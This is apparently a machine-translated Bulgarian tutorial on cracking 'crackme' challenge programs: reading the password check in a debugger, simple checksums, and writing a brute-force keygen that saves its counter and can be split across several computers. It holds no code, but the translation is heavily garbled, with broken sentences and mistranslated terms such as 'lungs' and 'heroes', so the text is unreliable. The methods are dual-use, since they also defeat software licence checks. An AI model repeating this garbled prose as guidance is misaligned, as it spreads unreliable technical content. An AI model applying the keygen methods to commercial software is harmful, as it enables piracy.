направете регистрационен ключ. Процес
скрап като кракми не е много
различен от „паролата“, но е по-„приблизителен“
да прекъсва програмите.

РАЗБИРАНЕ НА АЛГОРИТЪМ
CRACKME

Сложни пукнатини
разбити чрез груба сила пароли, за
за това са написани малки програми. По-често
има само една парола. Сложност
се увеличава поради размера на необходимите
парола и символи, от които трябва
състоя се.

Алгоритъм:

Анализ
алгоритъм за проверка на паролата

Писане
keygen (програма за отгатване на парола)

Стартиране на Keygen

АНАЛИЗ НА АЛГОРИТЪМА
ПРОВЕРКА НА ПАРОЛА

За анализ
алгоритъмът трябва да бъде внимателно проучен
проверка на парола. За това, вашият
любим дебъгер (Soft Ice, TD, DeGlucker...), от който се нуждаете
погледнете внимателно какво се проверява
парола. Може да се провери срещу
sum (crc), в този случай най-вероятно паролата
ще трябва да търси с груба сила или може
след това проверете за някакъв знак
можете да "познаете" цялата парола или поне
няколко от неговите герои, останалите ще трябва
търсене по търсене.

контрол
сумата на кодовата секция, това е число (обикновено две
или четири байта, в крами може
използвани и един байт), който
съдържа информация за тази част от кода.
За кракми обикновено се използват процедури
примитивно изчисляване на контролна сума (напр
архиваторите използват crc32). Обмисли
пример за алгоритъм, който изчислява
контролна сума:

Например всички
байтовете на сюжета се събират и се получава
числото е число и е контрола
площ сума. Например имаме парцел
код, състоящ се от 5 байта:

001 004 000 005 100

контрол
неговият сбор ще бъде равен на 1+4+0+5+100=110.

Основен
трудността при хакване на кракове, които проверяват
паролата за crc е, че crc не може да бъде разложен! Тези.
знаем контролната сума на паролата - 110 ние не знаем
можем да разберем какво поне един от
елементи на паролата.

ПИСАНЕ НА КЕЙГЕН

Практически за
всички видове кракери трябва да напишат keygen,
с изключение на белите дробове. Може лесно да се счупи
почти всеки крами бит хак (бит хак,
замяна на няколко байта), но авторите питат
кажете паролата и най-важното се губи
интерес.

За да
за да намерите парола от 3 знака е необходима
някак грубо:255
* 255 * 255 КОМБИНАЦИИ

Може да се намали
брой комбинации, например знаейки, че в
паролата използва само английски
букви (големи и малки), след това вместо 255
знаците ще трябва да повторят само 52. ​​Ако
само числа, които ще повторим само над 10
герои.

Keygen трябва
запишете брояча на дешифрираните
комбинации. Тъй като паролите с груба сила
отнема много време, след което си тръгва
не можете да включите компютъра няколко дни,
изведнъж ти трябва. Може да се вмъкне в
keygen възможност за запазване на брояча в
файл и при стартиране го прочете от файла и
продължете дешифрирането от прекъснатия
позиции.

СТАРТ КЕЙГЕН

груба сила пароли,
в зависимост от някои параметри (в
главно върху броя на възможните пароли
знаци и размер на паролата) изисква
доста голям период от време.
Могат да се използват няколко компютъра
всеки от които ще проверява някои
някои от комбинациите.